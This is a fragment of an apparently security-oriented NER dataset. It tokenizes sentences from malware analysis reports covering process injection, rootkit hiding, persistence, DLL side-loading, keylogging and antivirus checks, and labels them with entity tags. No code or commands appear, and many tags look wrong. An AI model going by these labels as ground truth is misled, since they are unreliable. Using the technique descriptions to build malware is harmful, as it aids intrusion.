"B-SamFile" ] }, { "tokens": [ "loading", "a", "fresh", "copy", "of", "“ntdll.dll”", "from", "disk", "to", "avoid", "process", "hollowing", "detection" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "executed", "via", "dllhost.exe", "using", "process", "hollowing", "techniques." ], "ner_tags": [ "O", "O", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "injects", "the", "rootkit", "when", "new", "processes", "are", "created" ], "ner_tags": [ "B-SamFile", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Injects", "the", "rootkit", "to", "a", "newly", "created", "process", "by", "another", "process", "and", "updates", "the", "callee", "via", "NamedPipe" ], "ner_tags": [ "B-Way", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "executes", "an", "executable", "using", "process", "hollowing" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Enumerates", "all", "running", "processes" ], "ner_tags": [ "B-SamFile", "O", "O", "O" ] }, { "tokens": [ "executes", "a", "file", "using", "ShellExecute" ], "ner_tags": [ "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "utilizes", "the", "same", "Common", "Name", "in", "their", "TLS", "certificate." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "secure", "communication", "through", "TLS", "encryption." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "support", "for", "TCP", "network", "streams", "(both", "IPv4", "and", "IPv6)," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Controlling", "attached", "camera", "devices", "to", "take", "pictures", "of", "the", "compromised", "computer’s", "surroundings." ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "takes", "screenshots", "at", "regular", "intervals." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "can", "periodically", "take", "screenshots", "and", "store", "them", "with", "information", "about", "the", "foreground", "process", "and", "time", "since", "the", "last", "user", "input" ], "ner_tags": [ "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "To", "limit", "the", "disk", "space", "used,", "images", "where", "fewer", "than", "5%", "of", "the", "pixels", "differ", "from", "the", "most", "recently", "stored", "capture", "aren’t", "saved." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "similar", "screen", "captures" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "uses", "a", "custom", "network", "protocol,", "which", "can", "function", "over", "HTTP" ], "ner_tags": [ "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "we", "can", "see", "one", "more", "HTTP", "request" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HTTP", "POST", "request", "used", "for", "FlowCloud", "C&C", "communication" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "can", "send", "and", "receive", "data", "over", "HTTP." ], "ner_tags": [ "O", "O", "O", "I-Features", "I-Features", "O", "B-Way" ] }, { "tokens": [ "communicates", "with", "a", "hardcoded", "IP", "address", "via", "HTTP." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "can", "communicate", "over", "HTTP", "or", "via", "its", "“normal", "protocol”." ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "HTTP", "protocol", "uses", "the", "message", "format", "detailed", "in", "the", "previous", "paragraph,", "but", "it", "adds", "a", "few", "extra", "steps", "to", "disguise", "its", "traffic", "as", "legitimate", "HTTP" ], "ner_tags": [ "O", "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "The", "fields", "required", "for", "HTTP" ], "ner_tags": [ "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "used", "for", "HTTP", "client", "requests" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "used", "for", "HTTP", "server", "responses" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "HTTP", "by", "prepending", "the", "data", "with", "a", "hardcoded" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "or", "raw", "TCP,", "for", "C&C", "server", "communications." ], "ner_tags": [ "O", "I-Tool", "O", "O", "O", "O", "B-Idus" ] }, { "tokens": [ "can", "communicate", "over", "raw", "TCP", "sockets." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "normal", "protocol", "uses", "raw", "TCP", "sockets", "and", "a", "custom", "message", "format" ], "ner_tags": [ "O", "O", "O", "B-Tool", "B-HackOrg", "B-Tool", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "which", "can", "check", "running", "processes" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "which", "can", "check", "running", "processes", "against", "a", "hardcoded", "list" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "backdoors", "can", "list", "running", "processes." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features" ] }, { "tokens": [ "functionalities", "that", "collect", "information", "about", "programs", "and", "processes," ], "ner_tags": [ "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Other", "commands", "can", "be", "used", "to", "retrieve", "a", "detailed", "list", "of", "available", "services", "and", "currently", "running", "processes." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "It", "checks", "running", "processes" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "the", "running", "processes", "using", "CreateToolhelp32Snapshot", "and", "Process32Next" ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "B-Way" ] }, { "tokens": [ "the", "PID", "of", "the", "process", "in", "which", "the", "orchestrator", "is", "running." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "we", "found", "a", "custom", "AntivirusCheck", "class,", "which", "can", "check", "running", "processes", "against", "a", "hardcoded", "list", "of", "executable", "filenames", "from", "known", "security", "products,", "including", "ESET", "products" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Time", "O" ] }, { "tokens": [ "can", "check", "whether", "specific", "security", "software", "is", "installed", "on", "the", "machine", "it", "tries", "to", "compromise," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "there", "is", "a", "custom", "AntivirusCheck", "class,", "which", "can", "check", "running", "processes", "against", "a", "hardcoded", "list", "of", "XOR-encrypted", "executable", "filenames", "from", "known", "security", "products:", "360", "Total", "Security,", "Avast,", "Avira,", "AVG,", "Bitdefender,", "ESET,", "Jiangmin", "Technology", "Antivirus,", "Kingsoft,", "McAfee,", "Micropoint,", "Norton,", "Rising", "Antivirus,", "and", "Trend", "Micro." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-SecTeam", "I-SecTeam", "O", "B-Way", "B-Way", "B-Way", "B-Idus", "B-Time", "B-Idus", "B-SecTeam", "B-Tool", "B-Org", "B-Time", "B-Org", "B-Tool", "I-Tool", "O", "O", "B-Time", "B-SecTeam" ] }, { "tokens": [ "It", "checks", "running", "processes", "for", "executables", "of", "several", "known", "cybersecurity", "vendors." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "O" ] }, { "tokens": [ "contain", "a", "section", "defining", "specific", "security", "software", "to", "check", "for" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "include", "the", "ability", "to", "collect", "mouse", "movements,", "keyboard", "activity" ], "ner_tags": [ "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "records", "keystrokes." ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "backdoor’s", "components", "records", "mouse", "and", "keyboard", "activity", "to", "a", "database." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "with", "the", "keylogger", "component", "of", "the", "driver", "(described", "in", "the", "next", "section)", "by", "reading", "data", "from", "the", "\\\\.\\pipe\\namedpipe_keymousespy_english", "named", "pipe." ], "ner_tags": [ "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "it", "acts", "as", "both", "a", "keylogger" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Read", "(IRP_MJ_READ)", "for", "the", "keyboard", "driver", "(kbdclass", "or", "KeyboardClass0)" ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "handlers", "for", "keyboard", "and", "mouse", "events,", "the", "driver", "simply", "records", "IO", "events", "to", "lookaside", "lists", "before", "passing", "them", "to", "the", "legitimate", "handler." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Keylogging" ], "ner_tags": [ "O" ] }, { "tokens": [ "by", "compromising", "a", "web-facing", "application", "such", "as", "Microsoft", "Exchange", "or", "SharePoint" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "exploited", "Microsoft", "SharePoint", "servers", "in", "2019", "to", "gain", "code", "execution,", "probably", "by", "leveraging", "CVE-2019-0604" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Time", "O", "O", "O", "O", "O", "O", "O", "B-Features" ] }, { "tokens": [ "The", "public-facing", "application", "compromise", "approach" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "has", "exploited", "web", "server", "vulnerabilities", "for", "initial", "access." ], "ner_tags": [ "O", "O", "I-Exp", "I-Exp", "I-Exp", "O", "O", "O" ] }, { "tokens": [ "Initial", "access", "to", "targets", "is", "obtained", "by", "exploiting", "vulnerable", "internet-facing", "applications", "such", "as", "Microsoft", "Exchange," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "These", "were", "either", "dropped", "directly", "via", "the", "webshell", "or", "downloaded", "from", "a", "remote", "server" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "following", "files", "are", "downloaded", "and", "written", "to", "disk:" ], "ner_tags": [ "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "O" ] }, { "tokens": [ "The", "communications", "module", "then", "downloads", "the", "main", "backdoor", "module," ], "ner_tags": [ "O", "I-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "downloader", "simply", "downloads", "the", "loader" ], "ner_tags": [ "O", "B-SamFile", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "Encoded", "Royal", "Road", "payload" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "this", "encrypted", "file", "is" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "identical", "encrypted", "file" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "deployed", "in", "a", "multistage", "process", "that", "uses", "various", "obfuscation", "and", "encryption", "techniques", "to", "hinder", "analysis" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "values", "for", "these", "executables", "and", "configuration", "data", "can", "be", "found,", "encrypted,", "in", "the", "loader’s", "resource", "section." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "most", "resources", "are", "written", "to", "disk", "encrypted," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "In", "some", "cases,", "they", "are", "then", "re-encrypted", "but", "with", "a", "different", "key" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "same", "sequence", "of", "opcodes", "to", "obfuscate", "the", "program’s", "flow" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "control", "flow", "obfuscation", "snippet" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "files", "are", "distributed", "and", "stored", "in", "encrypted", "form." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Base64-encoded", "strings" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "new", "encrypted", "shellcode" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "This", "configuration", "file", "is", "encrypted", "using", "the", "just-described", "function", "and", "starts", "with", "the", "magic", "bytes", "0xAF1324BC" ], "ner_tags": [ "O", "I-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "and", "encrypted", "QuasarRAT", "payload" ], "ner_tags": [ "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "control", "flow", "obfuscation", "to", "hinder", "analysis" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "document", "triggers", "the", "injection", "of", "a", "custom", "downloader", "–", "a", "PE", "executable", "–", "into", "an", "iexplore.exe", "process." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "that", "decrypts", "hardcoded", "shellcode" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "Shellcode", "decryption", "loop" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "and", "only", "decrypted", "in", "memory", "when", "needed." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "loader", "decrypts", "and", "parses", "the", "embedded", "installation", "configuration" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "rootkit", "module", "is", "decrypted" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "self-decrypting", "DLL," ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "[sic]", "section", "of", "a", "decoded", "FlowCloud", "config" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "It", "first", "decrypts", "the", "embedded", "DLL", "using", "a", "byte-oriented", "XOR-and-ADD", "scheme" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "Once", "it", "has", "decrypted", "the", "embedded", "DLL" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Self-decrypting", "DLL" ], "ner_tags": [ "B-Way", "B-Tool" ] }, { "tokens": [ "The", "loaded", "shellcode", "is", "a", "self-decrypting", "DLL." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "DLL", "decryption", "routine" ], "ner_tags": [ "B-SamFile", "O", "O" ] }, { "tokens": [ "and", "only", "decoded", "as", "needed." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "a", "thread", "that", "decrypts", "and", "loads", "the", "fcClient", "module" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "decrypted", "shellcode" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "decrypt", "the", "embedded", "module" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "into", "the", "shellcode", "that", "will", "decompress", "and", "load", "the", "Korplug", "payload." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "It", "decrypts", "and", "loads" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "decrypted", "before", "being", "written" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "and", "injects", "it", "into", "iexplore.exe", "using", "WriteProcessMemory." ], "ner_tags": [ "O", "B-Features", "O", "O", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "The", "next", "stage,", "injected", "into", "iexplore.exe" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "The", "injected", "code", "loads", "the", "same", "backdoor", "(rescure.dat)", "into", "the", "process’s", "memory", "and", "calls", "its", "startModule", "export", "to", "finish", "the", "installation." ], "ner_tags": [ "O", "B-SamFile", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "injection", "process" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "perform", "process", "injection", "to", "masquerade", "as", "harmless", "processes." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "module", "creates", "a", "new", "process", "using", "the", "same", "executable", "and", "performs", "process", "injection", "on", "it,", "redirecting", "the", "existing", "thread", "to", "the", "written", "code", "region." ], "ner_tags": [ "O", "B-SamFile", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "loader", "injects", "an", "orchestrator", "into", "memory", "in", "a", "svchost.exe", "process." ], "ner_tags": [ "O", "O", "B-Features", "O", "B-HackOrg", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "the", "orchestrator", "injects", "the", "network", "component", "into", "memory" ], "ner_tags": [ "O", "O", "B-Features", "I-Features", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "the", "process", "into", "which", "the", "shellcode", "will", "be", "injected" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "and", "inject", "shellcode," ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "Persistence", "for", "the", "downloaded", "payload", "is", "established", "via", "the", "Tendyron", "value", "under", "the", "Run", "key", "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "task", "or", "service", "attains", "persistence", "by", "being", "set", "to", "start", "automatically", "on", "boot" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "It", "then", "sets", "specific", "registry", "keys", "and", "files", "as", "guardrails", "to", "skip", "the", "setup", "on", "subsequent", "runs." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "uses", "filenames", "that", "are", "either", "similar", "to", "those", "of", "legitimate", "Windows", "files", "(e.g.,", "rebare.dll", "which", "could", "be", "mistaken", "for", "rebar.dll)", "or", "innocuous", "looking", "(e.g.,", "AC146142)", "to", "avoid", "suspicion." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "named", "after", "legitimate", "utilities", "are", "written", "into", "the", "%ProgramFiles%\\MSBuild\\Microsoft\\Expression\\Blend\\msole\\", "subdirectory." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "process", "is", "further", "camouflaged", "by", "changing", "its", "associated", "executable", "filename", "to", "one", "of", "svchost.exe", "or", "dllhost.exe", "in", "the", "same", "kernel", "structure." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "registry", "key", "where", "each", "embedded", "resource", "is", "to", "be", "written" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "by", "writing", "to", "specific", "registry", "keys." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "Network", "shellcode", "registry", "keys" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "stored", "in", "the", "Windows", "registry." ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "shows", "the", "three", "registry", "keys", "used" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "creating", "the", "files", "and", "registry", "keys" ], "ner_tags": [ "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "2001Path", "to", "the", "registry", "key", "for", "the", "PrintProcessor", "service" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "paths", "and", "registry", "keys", "to", "use" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "it", "can", "create", "a", "service" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "service", "is", "then", "created" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "can", "be", "configured", "to", "create", "a", "service", "for", "persistence." ], "ner_tags": [ "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "it", "can", "create", "a", "service", "or", "scheduled", "task." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "persistence", "is", "established", "by", "using", "the", "ITaskService", "COM", "interface", "to", "create", "the", "\\Microsoft\\Windows\\CertificateServicesClient\\NetTask", "scheduled", "task" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "task", "will", "run", "the", "DLL", "hijacking", "target", "as", "SYSTEM", "at", "each", "boot." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "uses", "COM", "interfaces", "to", "schedule", "tasks" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "creates", "a", "scheduled", "task", "for", "persistence." ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "service", "was", "configured", "to", "execute", "the", "next", "step", "of", "the", "installation", "process", "by", "running", "a", "legitimate", "application" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "service", "is", "then", "created", "to", "run", "that", "module", "and", "is", "immediately", "started" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "target", "for", "DLL", "side-loading" ], "ner_tags": [ "O", "O", "B-Way", "O" ] }, { "tokens": [ "DLL", "side-loading" ], "ner_tags": [ "B-SamFile", "B-SecTeam" ] }, { "tokens": [ "the", "malicious", "library", "is", "the", "same", "and", "serves", "to", "load", "and", "execute", "shellcode", "from", "a", "file", "that", "is", "stored", "under", "the", "same", "name", "as", "the", "DLL" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "new", "process", "loads", "the", "decoy", "DLL", "and", "manually", "replaces", "its", "content", "in", "memory", "with", "the", "fcClientDll", "module", "(a", "process", "known", "as", "module", "stomping", "or", "DLL", "hollowing)," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "I-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "uses", "DLL", "Side-Loading", "to", "launch", "its", "second-stage", "dropper." ], "ner_tags": [ "O", "B-Way", "B-SecTeam", "O", "O", "O", "O", "O" ] }, { "tokens": [ "If", "a", "task", "with", "the", "same", "name", "already", "exists,", "it", "is", "deleted", "before", "the", "new", "one", "is", "created" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "After", "hijacking", "the", "aforementioned", "drivers,", "the", "rootkit", "erases", "the", "DLL", "names", "associated", "with", "them", "from", "internal", "structures", "used", "to", "display", "device", "drivers." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Covers", "its", "tracks", "by", "overwriting", "the", "code", "previously", "modified", "by", "the", "malicious", "library", "with", "a", "useless", "call", "to", "lstrlenW." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "removing", "their", "entries", "from", "the", "ActiveProcessLinks", "list", "of", "the", "undocumented", "KPROCESS", "kernel", "structure." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "file", "is", "then", "deleted", "from", "the", "disk" ], "ner_tags": [ "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "deletes", "its", "rootkit’s", "executable", "after", "launching", "it." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "then", "starts", "a", "suspended", "process", "to", "perform", "injection", "on", "it." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "stores", "collected", "data", "in", "local", "SQLite", "databases", "prior", "to", "exfiltration." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Each", "manager", "stores", "collected", "data", "in", "its", "own", "SQLite", "database,", "while", "data", "that", "is", "collected", "on", "demand", "is", "returned", "directly", "to", "the", "C&C", "server" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "uses", "local", "caches", "to", "stage", "data" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "data", "can", "be", "collected", "locally", "by", "the", "corresponding", "class", "before", "it", "is", "staged", "for", "exfiltration." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "can", "exfiltrate", "files", "from", "local", "file", "systems." ], "ner_tags": [ "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "The", "corresponding", "files", "are", "collected" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Monitoring", "file", "system", "events", "to", "collect", "new", "and", "modified", "files." ], "ner_tags": [ "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "can", "search", "through", "connected", "file", "systems", "and", "obtain", "directory", "listings." ], "ner_tags": [ "O", "B-Features", "O", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg" ] }, { "tokens": [ "walks", "through", "all", "mapped", "file", "systems", "and", "collects", "files" ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features" ] }, { "tokens": [ "collects", "file", "and", "directory", "metadata" ], "ner_tags": [ "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "uses", "malicious", "RTF", "and", "DOCX", "attachments", "to", "compromise", "victims." ], "ner_tags": [ "O", "O", "B-Tool", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "sending", "spearphishing", "emails", "with", "malicious", "attachments", "such", "as", "RTF", "documents", "created", "via", "the", "Royal", "Road", "builder" ], "ner_tags": [ "O", "B-Way", "I-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "makes", "extensive", "use", "of", "the", "Windows", "API", "to", "execute", "commands", "and", "launch", "processes." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "I-Features", "O" ] }, { "tokens": [ "performs", "the", "functions", "of", "LoadLibrary", "and", "calls", "the", "loaded", "module’s", "startModule", "export." ], "ner_tags": [ "O", "O", "O", "O", "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "used", "for", "function", "imports", "(via", "GetProcAddress)" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way" ] }, { 